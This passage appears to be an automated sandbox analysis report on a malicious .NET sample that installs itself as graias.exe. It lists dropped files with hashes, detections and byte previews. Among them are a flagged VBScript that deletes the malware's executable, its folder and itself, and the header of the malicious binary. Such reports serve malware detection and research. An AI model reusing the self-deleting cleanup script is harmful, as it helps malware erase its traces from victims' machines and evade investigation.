                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):83964
                                                                                                                                                                                                                                          Entropy (8bit):5.188571918391598
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:768:QP9UpyBAyBjl6UhPJgG6ofJvV7lV6EMR5uX3l0hG6NUVPkNEr+aL/FkJOlKwY0:QD3VP6muR2gUeOu0
                                                                                                                                                                                                                                          MD5:C07F7DE7E42D289AF493F73A6E8B10ED
                                                                                                                                                                                                                                          SHA1:545FA4175045C0960E750D1E03E5330CFEBF78B5
                                                                                                                                                                                                                                          SHA-256:76667BFCFC739EB9FC89837608EB0BE4A11E995E181A245840230E829F49529A
                                                                                                                                                                                                                                          SHA-512:A8D049FF6AF1CB1E8F942106E41976DD28C48BE96220D50E03F7DA3F6E260B8E0E83C042EE8822FF3B232BC58E6BCFE84A46302CE4BDFD59D2A3C769B3ECA49E
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:------------------..System Information..------------------.. Time of this report: 1/3/2025, 18:02:34.. Machine name: 783875.. Machine Id: Unknown.. Operating System: Windows 10 Pro 64-bit (10.0, Build 19045) (19041.vb_release.191206-1406).. Language: English (Regional Setting: English).. System Manufacturer: FwOzYOUKbAaU2RD.. System Model: eSZX 9p9.. BIOS: VMW201.00V.20829224.B64.2211211842 (type: UEFI).. Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 CPUs), ~2.0GHz.. Memory: 8192MB RAM.. Available OS Memory: 8192MB RAM.. Page File: 2467MB used, 5723MB available.. Windows Dir: C:\Windows.. DirectX Version: DirectX 12.. DX Setup Parameters: Not found.. User DPI Setting: 96 DPI (100 percent).. System DPI Setting: 96 DPI (100 percent).. DWM DPI Scaling: Disabled.. Miracast: N
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):626
                                                                                                                                                                                                                                          Entropy (8bit):3.435185090535513
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:xQ4lA2++ugypjBQMPURbRKMJV62Q3DoRKMJV629HPoRKMJVo/0aimi:7a2+SDdrr62QTorr629vorrhait
                                                                                                                                                                                                                                          MD5:771DE7523AB6947394C64CFD5BBB3B99
                                                                                                                                                                                                                                          SHA1:CCD78BE7B23A93DF03CCC675B4E1A60EEB13B276
                                                                                                                                                                                                                                          SHA-256:25AD41ACE65051280FE9743DB008A160CA8442069BE38224CE862094EEDC314B
                                                                                                                                                                                                                                          SHA-512:CB13EC679DA933FEF28079EDA4EECA5DD029B6556D5F9C9C8E34E3EE7224C2682F0B817B667A7FDA9D04B612A01A4D7767CEB0CF2687111E162E24F61472890B
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...w.h.i.l.e. .f.s.o...F.i.l.e.E.x.i.s.t.s.(.".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.G.r.a.i.a.s.\.g.r.a.i.a.s...e.x.e.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.G.r.a.i.a.s.\.g.r.a.i.a.s...e.x.e."...w.e.n.d...f.s.o...D.e.l.e.t.e.F.o.l.d.e.r. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.G.r.a.i.a.s."...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

Process:C:\Users\user\Desktop\iGhDjzEiDU.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):983040
Entropy (8bit):7.849370824950313
Encrypted:false
SSDEEP:24576:GzrpUdcKiEWIXZ4aQJkf1dedJNxkTeGnAoEe:cpKiEWIJ4aWkfjedxkTeGAo9
MD5:7CAF240DB905F259197CF71B03ACF888
SHA1:D8D9726A0A67795A01FED368055D9315FEADA3FD
SHA-256:C8017F526793DD8B6B6E98BFA9847FCF3AA7C4096A8432719A8324E06BA8C088
SHA-512:1F9464E14D33BFAB44DFC85486BEA31126A26929E04EAE1159E6ECC886AA79877CA29AA93E614512625000D153E090C06B3B2081F9CBC1E8997AD26E59097255
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 71%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Qrg..............0......4........... ........@.. .......................`............`.................................t...O........1...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....1.......2..................@..@.reloc.......@......................@..B........................H........D..T0..........<u..8s...........................................0............}......}......}.....(.......(......{.....r...pr...p~9...%-.&~8.........s....%.9...(...+(...+~:...%-.&~8...../...s....%.:...(...+...5...%..(...+s.....%.r...p.%.r#..p...6...(....r5..p ............%...%...(......{....o....&*..0..H.........{....o ...r...po!.....,..rS..p("...&.{....o....&8.....{....o ...r...po!.....,..r{..p("...&.{....o....&8.....{....o#........,....{.....X}.....+....}.....s.....

Process:C:\Users\user\Desktop\iGhDjzEiDU.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Preview:[ZoneTransfer]....ZoneId=0

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):13339
Entropy (8bit):7.683569563478597
Encrypted:false
SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
MD5:512625CF8F40021445D74253DC7C28C0
SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
Malicious:false
Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:dropped
Size (bytes):1432
Entropy (8bit):4.986131881931089
Encrypted:false
SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
MD5:6B8763B76F400DC480450FD69072F215
SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
Malicious:false
Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:downloaded
Size (bytes):18367
Entropy (8bit):7.7772261735974215
Encrypted:false
SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
MD5:240C4CC15D9FD65405BB642AB81BE615
SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
Malicious:false
URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:SVG Scalable Vector Graphics image
Category:dropped
Size (bytes):1154
Entropy (8bit):4.59126408969148
Encrypted:false
SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
MD5:37258A983459AE1C2E4F1E551665F388
SHA1:603A4E9115E613CC827206CF792C62AEB606C941
SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
Malicious:false
Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JSON data
Category:dropped
Size (bytes):3130
Entropy (8bit):4.790069981348324
Encrypted:false
SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
MD5:EBA6E81304F2F555E1D2EA3126A18A41
SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
Malicious:false
Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):15427
                                                                                                                                                                                                                                          Entropy (8bit):7.784472070227724
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                                                          MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                                                          SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                                                          SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                                                          SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):47062
                                                                                                                                                                                                                                          Entropy (8bit):5.016149588804727
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:768:haAq16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTKGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                                                                          MD5:1FF4CE3C1DB69A5146B03AD8BE62F5EB
                                                                                                                                                                                                                                          SHA1:5D177F6D11FCFF2BD62E61983383BB39D9F045E4
                                                                                                                                                                                                                                          SHA-256:222F320F99EF710DCE98F125314F30DAC99CF408525D86F185B317A878D48A5C
                                                                                                                                                                                                                                          SHA-512:36D198120D83AA9BDC2E74F80B99E2219EE4F03A8DD93A1E58A9E30BD48E829E5220A9F5FE6FC29B3810ED85005A8DCD0EAD04EE06DCCD0A15CD6D080E88641D
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                          Entropy (8bit):3.875
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:HMB:k
                                                                                                                                                                                                                                          MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                                                                          SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                                                                                          SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                                                                          SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                                                                          Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):207935
                                                                                                                                                                                                                                          Entropy (8bit):5.420780972514107
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                                                                          MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                                                                          SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                                                                          SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                                                                          SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):27868
                                                                                                                                                                                                                                          Entropy (8bit):5.155680085584642
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:768:63ZUfTvLg6jLjnjrjGjXMQjtzjMFzXY8v1gWj/rlOVqnACpK3o3hhl0OU2/8BlsX:BTvL7HBJv11pOVqlh382/rIN1Y
                                                                                                                                                                                                                                          MD5:0A0F2E1CCB8E5F7C38CB11B101A8941F
                                                                                                                                                                                                                                          SHA1:112F4B7CB3DEDB9D9744CAC000E05DC949E89891
                                                                                                                                                                                                                                          SHA-256:DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
                                                                                                                                                                                                                                          SHA-512:9BD4E9C2415FB62E55D04DDEB9ECE04CB9AE2B8F8B93632A11A0AFD1CE6A632DF7D58DD571BF34C6E8E99107E80340CFAFF4BB4A8E18D05B5CAA7445DE55839C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):207935
                                                                                                                                                                                                                                          Entropy (8bit):5.420780972514107
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                                                                          MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                                                                          SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
